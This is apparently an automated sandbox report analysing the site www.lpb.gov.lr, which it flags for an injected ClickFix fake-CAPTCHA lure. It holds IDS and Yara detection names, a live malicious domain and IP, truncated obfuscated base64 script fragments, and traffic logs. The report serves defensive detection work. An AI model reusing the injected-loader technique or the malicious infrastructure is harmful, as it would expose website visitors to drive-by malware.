Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://www.lpb.gov.lr

Overview

General Information

Sample URL:http://www.lpb.gov.lr
Analysis ID:1587560
Infos:

Detection

CAPTCHA Scam ClickFix
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
HTML page contains hidden javascript code
HTML page contains obfuscated script src

Classification

  • System is w10x64
  • chrome.exe (PID: 7164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2020,i,1401660104828824542,16529630401090676831,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 6936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.lpb.gov.lr" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.0.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    0.1.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
      0.2.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-10T14:54:55.329509+010020583451Exploit Kit Activity Detected192.168.2.7558221.1.1.153UDP
        2025-01-10T14:54:55.329878+010020583451Exploit Kit Activity Detected192.168.2.7554561.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-10T14:55:25.488795+010020583461Exploit Kit Activity Detected192.168.2.749938185.121.235.167443TCP

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: 0.0.pages.csv, type: HTML
        Source: Yara matchFile source: 0.1.pages.csv, type: HTML
        Source: Yara matchFile source: 0.2.pages.csv, type: HTML
        Source: https://www.lpb.gov.lr/HTTP Parser: Base64 decoded: function _0x367c(_0x120241, _0x2ffedb) { const _0x5015ac = _0x48a0(); return _0x367c = function (_0x1f1822, _0x5a4548) { _0x1f1822 = _0x1f1822 - (0x3 * 0x875 + -0x1027 + -0x77e); let _0x30c0f0 = _0x5015ac[_0x1f1822]; return...
        Source: https://www.lpb.gov.lr/HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gXzB4MzY3YyhfMHgxMjAyNDEsIF8weDJmZmVkYikgewogICAgY29uc3QgXzB4NTAxNWFjID0gXzB4NDhhMCgpOwogICAgcmV0dXJuIF8weDM2N2MgPSBmdW5jdGlvbiAoXzB4MWYxODIyLCBfMHg1YTQ1NDgpIHsKICAgICAgICBfMHgxZjE4MjIgPSBfMHgxZjE4MjIgLSAoMHgzIC
        Source: https://www.lpb.gov.lr/HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gXzB4MzY3YyhfMHgxMjAyNDEsIF8weDJmZmVkYikgewogICAgY29uc3QgXzB4NTAxNWFjID0gXzB4NDhhMCgpOwogICAgcmV0dXJuIF8weDM2N2MgPSBmdW5jdGlvbiAoXzB4MWYxODIyLCBfMHg1YTQ1NDgpIHsKICAgICAgICBfMHgxZjE4MjIgPSBfMHgxZjE4MjIgLSAoMHgzIC
        Source: https://www.lpb.gov.lr/HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gXzB4MzY3YyhfMHgxMjAyNDEsIF8weDJmZmVkYikgewogICAgY29uc3QgXzB4NTAxNWFjID0gXzB4NDhhMCgpOwogICAgcmV0dXJuIF8weDM2N2MgPSBmdW5jdGlvbiAoXzB4MWYxODIyLCBfMHg1YTQ1NDgpIHsKICAgICAgICBfMHgxZjE4MjIgPSBfMHgxZjE4MjIgLSAoMHgzIC

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2058345 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (saaadnesss .shop) : 192.168.2.7:55456 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2058345 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (saaadnesss .shop) : 192.168.2.7:55822 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2058346 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in TLS SNI (saaadnesss .shop) : 192.168.2.7:49938 -> 185.121.235.167:443
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownUDP traffic detected without corresponding DNS query: 104.40.149.189
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: lpb.gov.lrConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /npm/web3@latest/dist/web3.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /npm/crypto-js@4.1.1/crypto-js.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/pako/2.0.4/pako.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.1 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0.2 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/css/be.css?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/assets/animations/animations.min.css?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/fonts/fontawesome/fontawesome.css?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.min.css?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/pako/2.0.4/pako.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/css/responsive.css?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/home-page-image.png HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/logo-1.png HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/assets/dummy.png HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/fonts/fontawesome/fa-solid-900.woff2 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.lpb.gov.lrsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.lpb.gov.lr/wp-content/themes/betheme/fonts/fontawesome/fontawesome.css?ver=27.0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/so-css/so-css-betheme.css?ver=1707433542 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/betheme/css/post-2.css?ver=1736517284 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.6.13 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/assets/dummy.png HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/logo-1.png HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0.2 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
